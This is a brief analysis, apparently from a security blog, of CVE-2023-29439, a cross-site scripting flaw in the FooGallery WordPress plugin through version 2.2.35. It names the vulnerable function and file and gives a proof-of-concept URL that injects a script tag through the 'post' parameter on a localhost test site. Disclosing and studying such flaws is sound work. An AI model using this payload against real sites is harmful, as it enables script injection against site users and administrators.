CVE-2023-29439 Analysis
Vulenerability details
Description
In Foogallery 2.2.35 and earlier, the function foogallery_image_editor_modal in foogallery/includes/admin/class-gallery-attachment-modal.php is vulnerable to XSS attack.
Pre-requisite
- Unauthenticated
Proof-of-Concept
- Foogallery Settings → Admin → Enable Advanced Attachment Modal
- Send
http://localhost:8080/wp-admin/post-new.php?post_type=foogallery&post=”><script>alert(1)</script>
References
This post is licensed under CC BY 4.0 by the author.